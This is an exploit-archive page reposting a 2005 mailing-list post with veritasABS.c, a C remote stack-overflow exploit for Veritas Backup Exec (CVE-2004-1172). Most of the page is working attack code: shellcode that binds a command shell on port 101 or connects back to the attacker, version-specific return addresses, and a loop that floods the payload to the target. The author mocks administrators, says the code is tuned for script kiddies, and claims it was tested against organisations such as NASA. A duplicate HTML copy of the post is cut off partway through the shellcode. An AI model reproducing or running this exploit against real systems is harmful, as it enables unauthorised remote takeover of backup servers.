exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

veritasABS.c

veritasABS.c
Posted Jan 12, 2005
Authored by class101

Remote stack overflow exploit for Veritas Backup Exec. Works for versions 9.1.4691.SP1, 9.1.4691.SP0, and 8.5.3572. Allows for a shell to be bound to port 101 or it spawn a reverse shell as well.

tags | exploit, remote, overflow, shell
advisories | CVE-2004-1172
SHA-256 | 66d099090c243e36b9f7564b05d434f6f4b2b0d4406b819eb60322f646d6b2fc

veritasABS.c

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_003D_01C4F7DA.972C2380
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Because k-otik are poor looser not respecting the publication of =
metasploit 2.3 , im forced to post my code.

/*
VERITAS Backup Exec v9.1.4691.SP1
v9.1.4691.SP0
v8.5.3572
Agent Browser Service, Remote Stack Overflow

Highly Critical

All credits to:=20

-iDEFENSE(discovery-www.iDEFENSE.com),=20
-Thor Doomen(iat-syscall[at]inbox.lv),=20
-H.D. Moore(scode-www.metasploit.com),
-Matt Miller(scode-www.hick.org)

ExtraNotes:

All my tests/debugs where a bit long (some days) firstly due to the big =
size
of Backup Exec and the unstability accross differents windows versions
to make working that IAT method with 100% success and the difficulty to =
debug it.
(As a recall, due to the 60 bytes only free, a tiny shellcode is send in =
first to scan
the recv function of benetns.exe and jump to the data submitted during =
the second send,
thanx syscall. Let's think large now. Imagine that you exploits the hole =
and you submit
the shellcode 5 minutes later, the service will hang on to death of =
course until a kill,
now imagine that you exploits the hole and you submit the shellcode too =
faslty for the,
computer processing, the shellcode can be missed, wont be executed =
again, sometimes yes/no, but really unstable.=20
Hopefully (or unfortunely for you admin :>) I'm here to optimize it and =
make it 100% working, universal,
stable whatever you want for the good fortune of script kiddies and to =
show what mean working to my good
friends ka-odick :>
Tries
Machine Bind / Rverse / Success

(2x) Win2k SP4 Server English 10 10 20
(1x) Win2k SP4 Pro English 5 5 10
(1x) WinXP SP1 Pro English 5 5 10
(1x) WinXP SP1a Pro English 5 5 10
(3x) Win2003 SP0 Server English 5 5 10
(1x) Win2003 SP0 Server Ita. 5 5 10
(1x) NT4 Server English. 5 5 10

=3D Universal

v0.1:
C code based on Thor Doomen's code posted at the metasploit mailing =
list,
excellent in the method, but super unstable to not say not working when =
used,
made some changes.

v0.2:
fix of the first big problem , the missed shellcode accross differents =
windows,=20
fixed by flooding benetns with more sends, timer really small, this is =
important.
padding 1 nop to the reverse shellcode as needed, else crash on reverse.

v0.3:
universal esi call across v9.1 SP0 and SP1, for the good fortune of =
script kiddies.

v0.4:
As a warning, this poc v0.4 as been tested working by an anonymous =
tester (never mentionned there)
on some organisations such nasa, states/edus, it's urgent to update 1 =
month after the advisory, sleepers.

Tips: -make sure that your ip is safe of null bytes in reverse mode.
-make sure that you targets the good version of Backup Exec,
else you crash it.
-Backup Exec v10.0 is now available, get it at www.veritas.com.
-Visit dfind.kd-team.com for a patched benetns.exe, quick solution=20
for an urgent update. (extracted from the hotfix at www.veritas.com)
Backup Exec 9.x is tested safe after replacing the .exe

Greetings:=20
Nima Majidi
Behrang Fouladi
Pejman
keystr0ke
JGS
DiabloHorn
kimatrix
NaV
New Metasploit v2.3 (http://www.metasploit.com/)
and all idlers of #n3ws on Eris Free Network.

by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have, no I'm not =
persian and you don't care where I come from.

04 January 2005
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=3D
file://Matt Millers 'skape' shellcode.
"\x90" // pad needed their for me, if you get scode detection problems =
on slow connections,
file://try to add more NOP and make sure to update the memcpys later in =
the code.
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70=
\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c=
\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3=
\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03=
\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f=
\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8=
\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e=
\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa=
\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9=
\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83=
\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73=
\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8=
\x01\x63"
"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54=
\x83\xc0"
"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14=
\x8b\xf0"
"\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0=
\x10\x50"
"\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa=
\x5f\xc6"
"\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d=
\x77\x44"
"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7=
\xd0\x50"
"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90=
\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90";


char scode2[]=3D
file://HD.Moore Shellcode
file://"\x90" uncomment this if you have scode detection problem on =
slows connections or try more NOP,
file://but for me and some other guys its already fine like this.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC=
\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03=
\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89=
\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4=
\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C=
\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03=
\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E=
\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89=
\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25=
\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3=
\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77=
\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8=
\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED=
\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8=
\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1=
\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4=
\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8=
\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD=
\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77=
\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53=
\xDB\x77"
"\x58\x68\x61\x63\x6B\x90"; =20

static char payload[800];
char v91sp0sp1[]=3D"\xFF\x50\x11\x40";
char esisp0sp1[]=3D"\xA1\xFF\x42\x01";
char v85[]=3D"\xFF\x38\x11\x40";
char esiold[]=3D"\xB9\x08\x43\x01";

char talk[] =3D
"\x02\x00\x32\x00"
"\x90\x90\x90\x90"
"\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
"\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
"\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
"\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x00"
"1.1.1.1.1.1"
"\x00"
"\xEB\x80";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *os;
if =
(argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return =
-1;}=20
if (argc=3D=3D5){usage(argv[0]);return -1;}=20
if (strlen(argv[2])<7){usage(argv[0]);return -1;}=20
if (argc=3D=3D6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}=20
}
#ifndef WIN32
if (argc=3D=3D6)
{
gip=3Dinet_addr(argv[4])^(long)0x00000000;
gport=3Dhtons(atoi(argv[5]))^(short)0x0000;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=3D0){printf("[+] wsastartup =
error\n");return -1;}
if (argc=3D=3D6)
{
gip=3Dinet_addr(argv[4])^(ULONG)0x00000000;
gport=3Dhtons(atoi(argv[5]))^(USHORT)0x0000;
}
#endif
int ip=3Dhtonl(inet_addr(argv[2])), port;
if (argc=3D=3D4||argc=3D=3D6){port=3Datoi(argv[3]);} else port=3D6101;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=3Dsocket(AF_INET,SOCK_STREAM,0);
if (s=3D=3D-1){printf("[+] socket() error\n");return -1;}=20
if (atoi(argv[1])=3D=3D1) {memcpy(&talk[37], &v91sp0sp1, =
4);memcpy(&talk[72], &esisp0sp1, 4);os=3D"Backup Exec v9.1.4691.1\n[+] =
Backup Exec v9.1.4691.0";}
else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, =
4);os=3D"Backup Exec v8.5.3572";}
if (argc=3D=3D6)
{
memcpy(&scode1[282], &gip, 4);
memcpy(&scode1[289], &gport, 2);
strcat(payload,scode1);
}
else strcat(payload,scode2);
printf("[+] target(s): %s\n",os); =20
server.sin_family=3DAF_INET;
server.sin_addr.s_addr=3Dhtonl(ip);
server.sin_port=3Dhtons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3D3;timeout.tv_usec=3D0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
if (send(s,talk,sizeof(talk)-1,0)=3D=3D-1) { printf("[+] sending =
error 1, the server prolly rebooted.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 2, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif

if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 3, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif

if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 4, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif

if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 5, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 6, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 7, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 8, the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif =20
printf("[+] size of payload: =
%d\n",(sizeof(talk)-1)+strlen(payload)*7); =20
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}


void usage(char* us)=20
{ =20
printf("USAGE:\n");
printf(" [+] . 101_BXEC.exe Version VulnIP\n");
printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT\n");
printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT GayIP =
GayPORT\n");
printf("VERSION: \n");
printf(" [+] 1. Backup Exec v9.1.4691.SP1\n");
printf(" [+] 1. Backup Exec v9.1.4691.SP0\n");
printf(" [+] 2. Backup Exec v8.5.3572\n");
printf("TARGET: \n");
printf(" [+] . 2k3/2k/XP/NT4 universal (*)\n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}=20
void ver()
{=20
printf(" =
\n");
printf(" =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[0.4=
]=3D=3D=3D=3D=3D=3D=3D=3D\n");
printf(" =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DVERITAS Backup Exec =
8.x/9.x=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");=20
printf(" =3D=3D=3D=3D=3D=3D=3D=3D=3DAgent Browser Service, =
Remote Stack Overflow=3D=3D=3D=3D=3D=3D=3D=3D\n");
printf(" =3D=3D=3D=3D=3D=3Dcoded by =
class101=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[Hat-Squad.com =
2005]=3D=3D=3D=3D=3D\n");
printf(" =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");
printf(" =
\n");
}

-------------------------------------------------------------
class101
Hat-Squad.com
-------------------------------------------------------------

------=_NextPart_000_003D_01C4F7DA.972C2380
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2614.3500" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Because k-otik are poor looser not =
respecting the=20
publication of metasploit 2.3 , im forced to post my code.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>/*<BR>VERITAS Backup Exec=20
v9.1.4691.SP1<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
v9.1.4691.SP0<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v8.5.3572<BR>Agent =
Browser=20
Service, Remote Stack Overflow</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Highly Critical</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>All credits to: </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>-iDEFENSE(discovery-www.iDEFENSE.com), =
<BR>-Thor=20
Doomen(iat-syscall[at]inbox.lv), <BR>-H.D.=20
Moore(scode-www.metasploit.com),<BR>-Matt=20
Miller(scode-www.hick.org)</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>ExtraNotes:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>All my tests/debugs where a bit long =
(some days)=20
firstly due to the big size<BR>of Backup Exec and the unstability =
accross=20
differents windows versions<BR>to make working that IAT method with 100% =
success=20
and the difficulty to debug it.<BR>(As a recall, due to the 60 bytes =
only free,=20
a tiny shellcode is send in first to scan<BR>the recv function of =
benetns.exe=20
and jump to the data submitted during the second send,<BR>thanx syscall. =
Let's=20
think large now. Imagine that you exploits the hole and you =
submit<BR>the=20
shellcode 5 minutes later, the service will hang on to death of course =
until a=20
kill,<BR>now imagine that you exploits the hole and you submit the =
shellcode too=20
faslty for the,<BR>computer processing, the shellcode can be missed, =
wont be=20
executed again, sometimes yes/no, but really unstable. <BR>Hopefully (or =

unfortunely for you admin :>) I'm here to optimize it and make it =
100%=20
working, universal,<BR>stable whatever you want for the good fortune of =
script=20
kiddies and to show what mean working to my good<BR>friends ka-odick=20
:><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;=20
Tries<BR>&nbsp;&nbsp;=20
Machine&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
&nbsp;Bind&nbsp; /=20
Rverse / Success</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>&nbsp;(2x) Win2k SP4&nbsp;&nbsp; Server =

English&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
10&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
10&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 20<BR>&nbsp;(1x) Win2k =
SP4&nbsp;&nbsp;=20
Pro&nbsp;&nbsp;&nbsp; English&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10<BR>&nbsp;(1x) WinXP =
SP1&nbsp;&nbsp;=20
Pro&nbsp;&nbsp;&nbsp; English&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10<BR>&nbsp;(1x) WinXP SP1a&nbsp;=20
Pro&nbsp;&nbsp;&nbsp; English&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10<BR>&nbsp;(3x) Win2003 SP0 =
Server=20
English&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10<BR>&nbsp;(1x) Win2003 SP0 =
Server=20
Ita.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10<BR>&nbsp;(1x)=20
NT4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Server=20
English.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 10</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial=20
size=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;=3D=20
Universal</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>v0.1:<BR>C code based on Thor Doomen's =
code posted=20
at the metasploit mailing list,<BR>excellent in the method, but super =
unstable=20
to not say not working when used,<BR>made some changes.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>v0.2:<BR>fix of the first big problem , =
the missed=20
shellcode accross differents windows, <BR>fixed by flooding benetns with =
more=20
sends, timer really small, this is important.<BR>padding 1 nop to the =
reverse=20
shellcode as needed, else crash on reverse.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>v0.3:<BR>universal esi call across v9.1 =
SP0 and=20
SP1, for the good fortune of script kiddies.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>v0.4:<BR>As a warning, this poc v0.4 as =
been tested=20
working by an anonymous tester (never mentionned there)<BR>on some =
organisations=20
such nasa, states/edus, it's urgent to update 1 month after the =
advisory,=20
sleepers.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Tips: -make sure that your ip is safe =
of null bytes=20
in reverse mode.<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -make sure that you =
targets=20
the good version of Backup Exec,<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; else =
you=20
crash it.<BR>&nbsp;&nbsp; -Backup Exec v10.0 is now available, get it at =
<A=20
href=3D"http://www.veritas.com">www.veritas.com</A>.<BR>&nbsp;&nbsp; =
-Visit=20
dfind.kd-team.com for a patched benetns.exe, quick solution =
<BR>&nbsp;&nbsp; for=20
an urgent update. (extracted from the hotfix at <A=20
href=3D"http://www.veritas.com">www.veritas.com</A>)<BR>&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;=20
Backup Exec 9.x is tested safe after replacing the .exe</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Greetings: <BR>&nbsp;&nbsp; Nima=20
Majidi<BR>&nbsp;&nbsp; Behrang Fouladi<BR>&nbsp;&nbsp; =
Pejman<BR>&nbsp;&nbsp;=20
keystr0ke<BR>&nbsp;&nbsp; JGS<BR>&nbsp;&nbsp; DiabloHorn<BR>&nbsp;&nbsp; =

kimatrix<BR>&nbsp;&nbsp; NaV<BR>&nbsp;&nbsp; New Metasploit v2.3 (<A=20
href=3D"http://www.metasploit.com/)">http://www.metasploit.com/)</A><BR>&=
nbsp;&nbsp;=20
and all idlers of #n3ws on Eris Free Network.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>by class101 [at] =
hat-squad.com<BR>answering to all=20
stupid questions that I got & will have, no I'm not persian and you =
don't=20
care where I come from.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>04 January 2005<BR>*/<BR>#include=20
<stdio.h><BR>#include <string.h><BR>#include=20
<time.h><BR>#ifdef WIN32<BR>#include "winsock2.h"<BR>#pragma =
comment(lib,=20
"ws2_32")<BR>#else<BR>#include <sys/socket.h><BR>#include=20
<sys/types.h><BR>#include <netinet/in.h><BR>#include=20
<netinet/in_systm.h><BR>#include <netinet/ip.h><BR>#include=20
<netdb.h><BR>#include <arpa/inet.h><BR>#include=20
<unistd.h><BR>#include <stdlib.h><BR>#include=20
<fcntl.h><BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>char scode1[]=3D<BR><A=20
href=3D"file://Matt">file://Matt</A> Millers 'skape' =
shellcode.<BR>"\x90"&nbsp; //=20
pad needed their for me, if you get scode detection problems on slow=20
connections,<BR><A href=3D"file://try">file://try</A> to add more NOP =
and make=20
sure to update the memcpys later in the=20
code.<BR>"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0=
c\x8b\x70\x1c\xad"<BR>"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x=
40\x3c\xc3\x60\x8b\x6c\x24\x24"<BR>"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\=
x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"<BR>"\x8b\x34\x8b\x03\xf5\x33=
\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"<BR>"\xf4\x3b\x5=
4\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"<BR=
>"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe=
8\xa9\xff"<BR>"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\x=
c3\x8e\x4e\x0e\xec\x72"<BR>"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\=
xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"<BR>"\xed\xfc\x3b\xe7\x79\xc6\x79\x83=
